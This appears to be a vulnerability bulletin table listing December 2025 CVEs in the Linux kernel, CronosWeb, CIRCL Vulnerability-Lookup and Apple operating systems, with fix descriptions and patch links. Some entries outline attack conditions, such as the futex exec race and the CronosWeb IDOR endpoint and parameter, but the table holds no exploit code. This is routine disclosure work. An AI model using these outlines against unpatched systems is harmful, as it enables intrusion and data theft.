| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: Fix crash in nfsd4_read_release() When tracing is enabled, the trace_nfsd_read_done trace point crashes during the pynfs read.testNoFh test. | 2025-12-08 | not yet calculated | CVE-2025-40324 | https://git.kernel.org/stable/c/930cb4fe3ab4061be31f20ee30bb72a66f7bb6d1 https://git.kernel.org/stable/c/375fdd8993cecc48afa359728a6e70b280dde1c8 https://git.kernel.org/stable/c/2ac46606b2cc49e78d8e3d8f2685e79e9ba73020 https://git.kernel.org/stable/c/03524ccff698d4a77d096ed529073d91f5edee5d https://git.kernel.org/stable/c/a4948875ed0599c037dc438c11891c9012721b1d https://git.kernel.org/stable/c/8f244b773c63fa480c9a3bd1ae04f5272f285e89 https://git.kernel.org/stable/c/abb1f08a2121dd270193746e43b2a9373db9ad84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: Define actions for the new time_deleg FATTR4 attributes NFSv4 clients won't send legitimate GETATTR requests for these new attributes because they are intended to be used only with CB_GETATTR and SETATTR. But NFSD has to do something besides crashing if it ever sees a GETATTR request that queries these attributes. RFC 8881 Section 18.7.3 states: > The server MUST return a value for each attribute that the client > requests if the attribute is supported by the server for the > target file system. If the server does not support a particular > attribute on the target file system, then it MUST NOT return the > attribute value and MUST NOT set the attribute bit in the result > bitmap. The server MUST return an error if it supports an > attribute on the target but cannot obtain its value. In that case, > no attribute values will be returned. Further, RFC 9754 Section 5 states: > These new attributes are invalid to be used with GETATTR, VERIFY, > and NVERIFY, and they can only be used with CB_GETATTR and SETATTR > by a client holding an appropriate delegation. Thus there does not appear to be a specific server response mandated by specification. Taking the guidance that querying these attributes via GETATTR is "invalid", NFSD will return nfserr_inval, failing the request entirely. | 2025-12-08 | not yet calculated | CVE-2025-40326 | https://git.kernel.org/stable/c/d8f3f94dc950e7c62c96af432c26745885b0a18a https://git.kernel.org/stable/c/4f76435fd517981f01608678c06ad9718a86ee98 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/core: Fix system hang caused by cpu-clock usage cpu-clock usage by the async-profiler tool can trigger a system hang, which got bisected back to the following commit by Octavia Togami: 18dbcbfabfff ("perf: Fix the POLL_HUP delivery breakage") causes this issue The root cause of the hang is that cpu-clock is a special type of SW event which relies on hrtimers. The __perf_event_overflow() callback is invoked from the hrtimer handler for cpu-clock events, and __perf_event_overflow() tries to call cpu_clock_event_stop() to stop the event, which calls hrtimer_cancel() to cancel the hrtimer. But that's a recursion into the hrtimer code from a hrtimer handler, which (unsurprisingly) deadlocks. To fix this bug, use hrtimer_try_to_cancel() instead, and set the PERF_HES_STOPPED flag, which causes perf_swevent_hrtimer() to stop the event once it sees the PERF_HES_STOPPED flag. [ mingo: Fixed the comments and improved the changelog. ] | 2025-12-09 | not yet calculated | CVE-2025-40327 | https://git.kernel.org/stable/c/6b8c512811644cf2f5eaf6f44e928683c54127f0 https://git.kernel.org/stable/c/eb3182ef0405ff2f6668fd3e5ff9883f60ce8801 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential UAF in smb2_close_cached_fid() find_or_create_cached_dir() could grab a new reference after kref_put() had seen the refcount drop to zero but before cfid_list_lock is acquired in smb2_close_cached_fid(), leading to use-after-free. Switch to kref_put_lock() so cfid_release() is called with cfid_list_lock held, closing that gap. | 2025-12-09 | not yet calculated | CVE-2025-40328 | https://git.kernel.org/stable/c/cb52d9c86d70298de0ab7c7953653898cbc0efd6 https://git.kernel.org/stable/c/065bd62412271a2d734810dd50336cae88c54427 https://git.kernel.org/stable/c/bdb596ceb4b7c3f28786a33840263728217fbcf5 https://git.kernel.org/stable/c/734e99623c5b65bf2c03e35978a0b980ebc3c2f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/sched: Fix deadlock in drm_sched_entity_kill_jobs_cb The Mesa issue referenced below pointed out a possible deadlock: [ 1231.611031] Possible interrupt unsafe locking scenario: [ 1231.611033] CPU0 CPU1 [ 1231.611034] ---- ---- [ 1231.611035] lock(&xa->xa_lock#17); [ 1231.611038] local_irq_disable(); [ 1231.611039] lock(&fence->lock); [ 1231.611041] lock(&xa->xa_lock#17); [ 1231.611044] <Interrupt> [ 1231.611045] lock(&fence->lock); [ 1231.611047] *** DEADLOCK *** In this example, CPU0 would be any function accessing job->dependencies through the xa_* functions that don't disable interrupts (eg: drm_sched_job_add_dependency(), drm_sched_entity_kill_jobs_cb()). CPU1 is executing drm_sched_entity_kill_jobs_cb() as a fence signalling callback so in an interrupt context. It will deadlock when trying to grab the xa_lock which is already held by CPU0. Replacing all xa_* usage by their xa_*_irq counterparts would fix this issue, but Christian pointed out another issue: dma_fence_signal takes fence.lock and so does dma_fence_add_callback. dma_fence_signal() // locks f1.lock -> drm_sched_entity_kill_jobs_cb() -> foreach dependencies -> dma_fence_add_callback() // locks f2.lock This will deadlock if f1 and f2 share the same spinlock. To fix both issues, the code iterating on dependencies and re-arming them is moved out to drm_sched_entity_kill_jobs_work(). [phasta: commit message nits] | 2025-12-09 | not yet calculated | CVE-2025-40329 | https://git.kernel.org/stable/c/70150b9443dddf02157d821c68abf438f55a2e8e https://git.kernel.org/stable/c/0d63031ee4a57be0252cb9a4e09ae921c75cece9 https://git.kernel.org/stable/c/3e8ada4fd838e3fd2cca94000dac054f3a347c01 https://git.kernel.org/stable/c/487df8b698345dd5a91346335f05170ed5f29d4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Shutdown FW DMA in bnxt_shutdown() The netif_close() call in bnxt_shutdown() only stops packet DMA. There may be FW DMA for trace logging (recently added) that will continue. If we kexec to a new kernel, the DMA will corrupt memory in the new kernel. Add bnxt_hwrm_func_drv_unrgtr() to unregister the driver from the FW. This will stop the FW DMA. In case the call fails, call pcie_flr() to reset the function and stop the DMA. | 2025-12-09 | not yet calculated | CVE-2025-40330 | https://git.kernel.org/stable/c/1a8a15c3f71d1199d510ccba4bc201cbd2204048 https://git.kernel.org/stable/c/bc7208ca805ae6062f353a4753467d913d963bc6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sctp: Prevent TOCTOU out-of-bounds write For the following path not holding the sock lock, sctp_diag_dump() -> sctp_for_each_endpoint() -> sctp_ep_dump() make sure not to exceed bounds in case the address list has grown between buffer allocation (time-of-check) and write (time-of-use). | 2025-12-09 | not yet calculated | CVE-2025-40331 | https://git.kernel.org/stable/c/b106a68df0650b694b254427cd9250c04500edd3 https://git.kernel.org/stable/c/3006959371007fc2eae4a078f823c680fa52de1a https://git.kernel.org/stable/c/72e3fea68eac8d088e44c3dd954e843478e9240e https://git.kernel.org/stable/c/584307275b2048991b2e8984962189b6cc0a9b85 https://git.kernel.org/stable/c/c9119f243d9c0da3c3b5f577a328de3e7ffd1b42 https://git.kernel.org/stable/c/2fe08fcaacb7eb019fa9c81db39b2214de216677 https://git.kernel.org/stable/c/89eac1e150dbd42963e13d23828cb8c4e0763196 https://git.kernel.org/stable/c/95aef86ab231f047bb8085c70666059b58f53c09 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix mmap write lock not release If mmap write lock is taken while draining retry fault, mmap write lock is not released because svm_range_restore_pages calls mmap_read_unlock then returns. This causes deadlock and system hangs later because mmap read or write lock cannot be taken. Downgrading mmap write lock to read lock if draining retry fault fixes this bug. | 2025-12-09 | not yet calculated | CVE-2025-40332 | https://git.kernel.org/stable/c/e2105ba1c262dcaa9573f11844b6e1e1ca762c3f https://git.kernel.org/stable/c/f7569ef1cf978aa87aa81b5e9bf40a77497f3685 https://git.kernel.org/stable/c/7574f30337e19045f03126b4c51f525b84e5049e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix infinite loop in __insert_extent_tree() When we get wrong extent info data, and look up extent_node in rb tree, it will cause infinite loop (CONFIG_F2FS_CHECK_FS=n). Avoid this by returning NULL and printing some kernel messages in that case. | 2025-12-09 | not yet calculated | CVE-2025-40333 | https://git.kernel.org/stable/c/765f8816d3959ef1f3f7f85e2af748594d091f40 https://git.kernel.org/stable/c/c0b9951bb2668d67eb4817bb23fc109abc08c075 https://git.kernel.org/stable/c/f4c31adcb2a0556f43776d4e51a67de88d7fb9ee https://git.kernel.org/stable/c/23361bd54966b437e1ed3eb1a704572f4b279e58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: validate userq buffer virtual address and size It needs to validate the userq object virtual address to determine whether it is resident in a valid vm mapping. | 2025-12-09 | not yet calculated | CVE-2025-40334 | https://git.kernel.org/stable/c/5a577de86c4a1c67ca405571d6ef84e65c6897d1 https://git.kernel.org/stable/c/9e46b8bb0539d7bc9a9e7b3072fa4f6082490392 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: validate userq input args This will help on validating the userq input args, and rejecting for the invalid userq request at the IOCTLs first place. | 2025-12-09 | not yet calculated | CVE-2025-40335 | https://git.kernel.org/stable/c/bdaa7ad3a5bb606d7dbd5c8627dc7efcb2392eb9 https://git.kernel.org/stable/c/219be4711a1ba788bc2a9fafc117139d133e5fea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/gpusvm: fix hmm_pfn_to_map_order() usage Handle the case where the hmm range partially covers a huge page (like 2M), otherwise we can potentially end up doing something nasty like mapping memory which is outside the range, and maybe not even mapped by the mm. Fix is based on the xe userptr code, which in a future patch will directly use gpusvm, so needs alignment here. v2: - Add kernel-doc (Matt B) - s/fls/ilog2/ (Thomas) | 2025-12-09 | not yet calculated | CVE-2025-40336 | https://git.kernel.org/stable/c/08e9fd78ba1b9e95141181c69cc51795c9888157 https://git.kernel.org/stable/c/c50729c68aaf93611c855752b00e49ce1fdd1558 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: Correctly handle Rx checksum offload errors The stmmac_rx function would previously set skb->ip_summed to CHECKSUM_UNNECESSARY if hardware checksum offload (CoE) was enabled and the packet was of a known IP ethertype. However, this logic failed to check if the hardware had actually reported a checksum error. The hardware status, indicating a header or payload checksum failure, was being ignored at this stage. This could cause corrupt packets to be passed up the network stack as valid. This patch corrects the logic by checking the `csum_none` status flag, which is set when the hardware reports a checksum error. If this flag is set, skb->ip_summed is now correctly set to CHECKSUM_NONE, ensuring the kernel's network stack will perform its own validation and properly handle the corrupt packet. | 2025-12-09 | not yet calculated | CVE-2025-40337 | https://git.kernel.org/stable/c/63fbe0e6413279d5ea5842e2423e351ded547683 https://git.kernel.org/stable/c/719fcdf29051f7471d5d433475af76219019d33d https://git.kernel.org/stable/c/1aa319e0f12d2d761a31556b82a5852c98eb0bea https://git.kernel.org/stable/c/ee0aace5f844ef59335148875d05bec8764e71e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: Intel: avs: Do not share the name pointer between components By sharing 'name' directly, tearing down components may lead to use-after-free errors. Duplicate the name to avoid that. At the same time, update the order of operations - since commit cee28113db17 ("ASoC: dmaengine_pcm: Allow passing component name via config") the framework does not override component->name if set before invoking the initializer. | 2025-12-09 | not yet calculated | CVE-2025-40338 | https://git.kernel.org/stable/c/128bf29c992988f8b4f3829227339908fde5ec86 https://git.kernel.org/stable/c/4dee5c1cc439b0d5ef87f741518268ad6a95b23d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix nullptr err of vm_handle_moved If a amdgpu_bo_va is fpriv->prt_va, the bo of this one is always NULL. So, such kind of amdgpu_bo_va should be updated separately before amdgpu_vm_handle_moved. | 2025-12-09 | not yet calculated | CVE-2025-40339 | https://git.kernel.org/stable/c/47281febebe337586569aa4c5694a7511063a42e https://git.kernel.org/stable/c/273d1ea12e42e9babb9783837906f3c466f213d3 https://git.kernel.org/stable/c/859958a7faefe5b7742b7b8cdbc170713d4bf158 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix oops in xe_gem_fault when running core_hotunplug test. I saw an oops in xe_gem_fault when running the xe-fast-feedback testlist against the realtime kernel without debug options enabled. The panic happens after core_hotunplug unbind-rebind finishes. Presumably what happens is that a process mmaps, unlocks because of the FAULT_FLAG_RETRY_NOWAIT logic, has no process memory left, causing ttm_bo_vm_dummy_page() to return VM_FAULT_NOPAGE, since there was nothing left to populate, and then oopses in "mem_type_is_vram(tbo->resource->mem_type)" because tbo->resource is NULL. It's convoluted, but fits the data and explains the oops after the test exits. | 2025-12-09 | not yet calculated | CVE-2025-40340 | https://git.kernel.org/stable/c/99428bd6123d5676209dfb1d7a8f176cc830b665 https://git.kernel.org/stable/c/29a3064f9c5a908aaf0b39cd6ed30374db11840d https://git.kernel.org/stable/c/1cda3c755bb7770be07d75949bb0f45fb88651f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: futex: Don't leak robust_list pointer on exec race sys_get_robust_list() and compat_get_robust_list() use ptrace_may_access() to check if the calling task is allowed to access another task's robust_list pointer. This check is racy against a concurrent exec() in the target process. During exec(), a task may transition from a non-privileged binary to a privileged one (e.g., setuid binary) and its credentials/memory mappings may change. If get_robust_list() performs ptrace_may_access() before this transition, it may erroneously allow access to sensitive information after the target becomes privileged. A racy access allows an attacker to exploit a window during which ptrace_may_access() passes before a target process transitions to a privileged state via exec(). For example, consider a non-privileged task T that is about to execute a setuid-root binary. An attacker task A calls get_robust_list(T) while T is still unprivileged. Since ptrace_may_access() checks permissions based on current credentials, it succeeds. However, if T begins exec immediately afterwards, it becomes privileged and may change its memory mappings. Because get_robust_list() proceeds to access T->robust_list without synchronizing with exec() it may read user-space pointers from a now-privileged process. This violates the intended post-exec access restrictions and could expose sensitive memory addresses or be used as a primitive in a larger exploit chain. Consequently, the race can lead to unauthorized disclosure of information across privilege boundaries and poses a potential security risk. Take a read lock on signal->exec_update_lock prior to invoking ptrace_may_access() and accessing the robust_list/compat_robust_list. This ensures that the target task's exec state remains stable during the check, allowing for consistent and synchronized validation of credentials. | 2025-12-09 | not yet calculated | CVE-2025-40341 | https://git.kernel.org/stable/c/6511984d1aa1360181bcafb1ca75df7f291ef237 https://git.kernel.org/stable/c/4aced32596ead1820b7dbd8e40d30b30dc1f3ad4 https://git.kernel.org/stable/c/3b4222494489f6d4b8705a496dab03384b7ca998 https://git.kernel.org/stable/c/b524455a51feb6013df3a5dba3160487b2e8e22a https://git.kernel.org/stable/c/6b54082c3ed4dc9821cdf0edb17302355cc5bb45 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-fc: use lock accessing port_state and rport state nvme_fc_unregister_remote removes the remote port on a lport object at any point in time when there is no active association. This races with the reconnect logic, because nvme_fc_create_association is not taking a lock to check the port_state and atomically increase the active count on the rport. | 2025-12-09 | not yet calculated | CVE-2025-40342 | https://git.kernel.org/stable/c/de3d91af47bc015031e7721b100a29989f6498a5 https://git.kernel.org/stable/c/e8cde03de8674b05f2c5e0870729049eba517800 https://git.kernel.org/stable/c/4253e0a4546138a2bf9cb6acf66b32fee677fc7c https://git.kernel.org/stable/c/25f4bf1f7979a7871974fd36c79d69ff1cf4b446 https://git.kernel.org/stable/c/9950af4303942081dc8c7a5fdc3688c17c7eb6c0 https://git.kernel.org/stable/c/a2f7fa75c4a2a07328fa22ccbef461db76790b55 https://git.kernel.org/stable/c/891cdbb162ccdb079cd5228ae43bdeebce8597ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmet-fc: avoid scheduling association deletion twice When forcefully shutting down a port via the configfs interface, nvmet_port_subsys_drop_link() first calls nvmet_port_del_ctrls() and then nvmet_disable_port(). Both functions will eventually schedule all remaining associations for deletion. The current implementation checks whether an association is about to be removed, but only after the work item has already been scheduled. As a result, it is possible for the first scheduled work item to free all resources, and then for the same work item to be scheduled again for deletion. Because the association list is an RCU list, it is not possible to take a lock and remove the list entry directly, so it cannot be looked up again. Instead, a flag (terminating) must be used to determine whether the association is already in the process of being deleted. | 2025-12-09 | not yet calculated | CVE-2025-40343 | https://git.kernel.org/stable/c/2f4852db87e25d4e226b25cb6f652fef9504360e https://git.kernel.org/stable/c/85e2ce1920cb511d57aae59f0df6ff85b28bf04d https://git.kernel.org/stable/c/601ed47b2363c24d948d7bac0c23abc8bd459570 https://git.kernel.org/stable/c/04d17540ef51e2c291eb863ca87fd332259b2d40 https://git.kernel.org/stable/c/c09ac9a63fc3aaf4670ad7b5e4f5afd764424154 https://git.kernel.org/stable/c/f2537be4f8421f6495edfa0bc284d722f253841d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: Intel: avs: Disable periods-elapsed work when closing PCM avs_dai_fe_shutdown() handles the shutdown procedure for HOST HDAudio stream while period-elapsed work services its IRQs. As the former frees the DAI's private context, these two operations shall be synchronized to avoid slab-use-after-free or worse errors. | 2025-12-09 | not yet calculated | CVE-2025-40344 | https://git.kernel.org/stable/c/ca6d2b7aca778afbf8c0c4b330d10cb228c14052 https://git.kernel.org/stable/c/b41fca4aa60be896ba8a81b57aac5dcc6eee66c0 https://git.kernel.org/stable/c/845f716dc5f354c719f6fda35048b6c2eca99331 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: storage: sddr55: Reject out-of-bound new_pba Discovered by Atuin - Automated Vulnerability Discovery Engine. new_pba comes from the status packet returned after each write. A bogus device could report values beyond the block count derived from info->capacity, letting the driver walk off the end of pba_to_lba[] and corrupt heap memory. Reject PBAs that exceed the computed block count and fail the transfer so we avoid touching out-of-range mapping entries. | 2025-12-12 | not yet calculated | CVE-2025-40345 | https://git.kernel.org/stable/c/d00a6c04a502cd52425dbf35588732c652b16490 https://git.kernel.org/stable/c/26e9b5da3231da7dc357b363883b5b7b51a64092 https://git.kernel.org/stable/c/aa64e0e17e3a5991a25e6a46007770c629039869 https://git.kernel.org/stable/c/04a8a6393f3f2f471e05eacca33282dd30b01432 https://git.kernel.org/stable/c/a20f1dd19d21dcb70140ea5a71b1f8cbe0c7e68f https://git.kernel.org/stable/c/5ebe8d479aaf4f41ac35e6955332304193c646f6 https://git.kernel.org/stable/c/b59d4fda7e7d0aff1043a7f742487cb829f5aac1 |
| CronosWeb i2A--CronosWeb | Direct Object Reference Vulnerability (IDOR) in i2A's CronosWeb, in versions prior to 25.00.00.12, inclusive. This vulnerability could allow an authenticated attacker to access other users' documents by manipulating the 'documentCode' parameter in '/CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonas'. | 2025-12-10 | not yet calculated | CVE-2025-41358 | https://www.incibe.es/en/incibe-cert/notices/aviso/direct-reference-insecure-objects-idor-cronosweb-cronosweb-i2a |
| CIRCL--Vulnerability-Lookup | In affected versions, vulnerability-lookup did not track or limit failed One-Time Password (OTP) attempts during Two-Factor Authentication (2FA) verification. An attacker who already knew or guessed a valid username and password could submit an arbitrary number of OTP codes without causing the account to be locked or generating any specific alert for administrators. This lack of rate-limiting and lockout on OTP failures significantly lowers the cost of online brute-force attacks against 2FA codes and increases the risk of successful account takeover, especially if OTP entropy is reduced (e.g. short numeric codes, user reuse, or predictable tokens). Additionally, administrators had no direct visibility into accounts experiencing repeated 2FA failures, making targeted attacks harder to detect and investigate. The patch introduces a persistent failed_otp_attempts counter on user accounts, locks the user after 5 invalid OTP submissions, resets the counter on successful verification, and surfaces failed 2FA attempts in the admin user list. This enforces an account lockout policy for OTP brute-force attempts and improves monitoring capabilities for suspicious 2FA activity. This issue affects Vulnerability-Lookup: before 2.18.0. | 2025-12-08 | not yet calculated | CVE-2025-42615 | https://vulnerability.circl.lu/vuln/gcve-1-2025-0033 |
| CIRCL--Vulnerability-Lookup | Some endpoints in vulnerability-lookup that modified application state (e.g. changing database entries, user data, configurations, or other privileged actions) may have been accessible via HTTP GET requests without requiring a CSRF token. This flaw leaves the application vulnerable to Cross-Site Request Forgery (CSRF) attacks: an attacker who tricks a logged-in user into visiting a malicious website could cause the user's browser to issue GET requests that perform unintended state-changing operations in the context of their authenticated session. Because the server would treat these GET requests as valid (since no CSRF protection or POST method enforcement was in place), the attacker could exploit this to escalate privileges, change settings, or carry out other unauthorized actions without needing the user's explicit consent or awareness. The fix ensures that all state-changing endpoints now require HTTP POST requests and include a valid CSRF token. This enforces that state changes cannot be triggered by arbitrary cross-site GET requests. This issue affects Vulnerability-Lookup: before 2.18.0. | 2025-12-08 | not yet calculated | CVE-2025-42616 | https://vulnerability.circl.lu/vuln/gcve-1-2025-0034 |
| CIRCL--Vulnerability-Lookup | In affected versions, vulnerability-lookup handled user-controlled content in comments and bundles in an unsafe way, which could lead to stored Cross-Site Scripting (XSS). On the backend, the related_vulnerabilities field of bundles accepted arbitrary strings without format validation or proper sanitization. On the frontend, comment and bundle descriptions were converted from Markdown to HTML and then injected directly into the DOM using string templates and innerHTML. This combination allowed an attacker who could create or edit comments or bundles to store crafted HTML/JavaScript payloads which would later be rendered and executed in the browser of any user visiting the affected profile page (user.html). This issue affects Vulnerability-Lookup: before 2.18.0. | 2025-12-08 | not yet calculated | CVE-2025-42620 | https://vulnerability.circl.lu/vuln/gcve-1-2025-0035 |
| Apple--macOS | The issue was addressed by adding additional logic. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to bypass launch constraint protections and execute malicious code with elevated privileges. | 2025-12-12 | not yet calculated | CVE-2025-43320 | https://support.apple.com/en-us/125887 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43351 | https://support.apple.com/en-us/125634 |
| Apple--macOS | This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Tahoe 26.1. A malicious app may be able to delete protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43381 | https://support.apple.com/en-us/125634 |
| Apple--macOS | An injection issue was addressed with improved validation. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43388 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A permissions issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to break out of its sandbox. | 2025-12-12 | not yet calculated | CVE-2025-43393 | https://support.apple.com/en-us/125634 |
| Apple--macOS | The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.1. An app may be able to cause unexpected system termination or corrupt process memory. | 2025-12-12 | not yet calculated | CVE-2025-43402 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A permissions issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43404 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A logic issue was addressed with improved restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43406 | https://support.apple.com/en-us/125634 |
| Apple--macOS | The issue was addressed with improved handling of caches. This issue is fixed in macOS Sequoia 15.7.2, macOS Sonoma 14.8.2. An attacker with physical access may be able to view deleted notes. | 2025-12-12 | not yet calculated | CVE-2025-43410 | https://support.apple.com/en-us/125636 https://support.apple.com/en-us/125635 |
| Apple--macOS | A logic issue was addressed with improved restrictions. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43416 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--iOS and iPadOS | An information disclosure issue was addressed with improved privacy controls. This issue is fixed in iOS 26.1 and iPadOS 26.1. An app may be able to fingerprint the user. | 2025-12-12 | not yet calculated | CVE-2025-43437 | https://support.apple.com/en-us/125632 |
| Apple--macOS | This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Tahoe 26.1. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43461 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sonoma 14.8.3, macOS Tahoe 26.1, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43463 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125634 https://support.apple.com/en-us/125887 |
| Apple--macOS | A denial-of-service issue was addressed with improved input validation. This issue is fixed in macOS Tahoe 26.1. Visiting a website may lead to an app denial-of-service. | 2025-12-12 | not yet calculated | CVE-2025-43464 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43465 | https://support.apple.com/en-us/125634 |
| Apple--macOS | An injection issue was addressed with improved validation. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43466 | https://support.apple.com/en-us/125634 |
| Apple--macOS | This issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.1. An app may be able to gain root privileges. | 2025-12-12 | not yet calculated | CVE-2025-43467 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.1. A standard user may be able to view files made from a disk image belonging to an administrator. | 2025-12-12 | not yet calculated | CVE-2025-43470 | https://support.apple.com/en-us/125634 |
| Apple--macOS | The issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43471 | https://support.apple.com/en-us/125634 |
| Apple--macOS | This issue was addressed with improved state management. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43473 | https://support.apple.com/en-us/125634 |
| Apple--macOS | The issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to cause a denial-of-service. | 2025-12-12 | not yet calculated | CVE-2025-43482 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A mail header parsing issue was addressed with improved checks. This issue is fixed in watchOS 26.1, iOS 18.7.2 and iPadOS 18.7.2, macOS Tahoe 26.1, visionOS 26.1, macOS Sonoma 14.8.2, macOS Sequoia 15.7.2, iOS 26.1 and iPadOS 26.1. An attacker may be able to cause a persistent denial-of-service. | 2025-12-12 | not yet calculated | CVE-2025-43494 | https://support.apple.com/en-us/125636 https://support.apple.com/en-us/125634 https://support.apple.com/en-us/125638 https://support.apple.com/en-us/125639 https://support.apple.com/en-us/125635 https://support.apple.com/en-us/125632 https://support.apple.com/en-us/125633 |
| Apple--macOS | An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to break out of its sandbox. | 2025-12-12 | not yet calculated | CVE-2025-43497 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A logic error was addressed with improved error handling. This issue is fixed in macOS Tahoe 26.1. iCloud Private Relay may not activate when more than one user is logged in at the same time. | 2025-12-12 | not yet calculated | CVE-2025-43506 | https://support.apple.com/en-us/125634 |
| Apple--macOS | This issue was addressed with improved data protection. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43509 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A memory corruption issue was addressed with improved lock state checking. This issue is fixed in watchOS 26.1, iOS 18.7.2 and iPadOS 18.7.2, macOS Tahoe 26.1, visionOS 26.1, tvOS 26.1, macOS Sonoma 14.8.2, macOS Sequoia 15.7.2, iOS 26.1 and iPadOS 26.1. A malicious application may cause unexpected changes in memory shared between processes. | 2025-12-12 | not yet calculated | CVE-2025-43510 | https://support.apple.com/en-us/125636 https://support.apple.com/en-us/125637 https://support.apple.com/en-us/125634 https://support.apple.com/en-us/125638 https://support.apple.com/en-us/125639 https://support.apple.com/en-us/125635 https://support.apple.com/en-us/125632 https://support.apple.com/en-us/125633 |
| Apple--iOS and iPadOS | A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-12 | not yet calculated | CVE-2025-43511 | https://support.apple.com/en-us/125633 |
| Apple--macOS | A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to elevate privileges. | 2025-12-12 | not yet calculated | CVE-2025-43512 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A permissions issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to read sensitive location information. | 2025-12-12 | not yet calculated | CVE-2025-43513 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A session management issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. A user with Voice Control enabled may be able to transcribe another user's activity. | 2025-12-12 | not yet calculated | CVE-2025-43516 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43517 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to inappropriately access files through the spellcheck API. | 2025-12-12 | not yet calculated | CVE-2025-43518 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
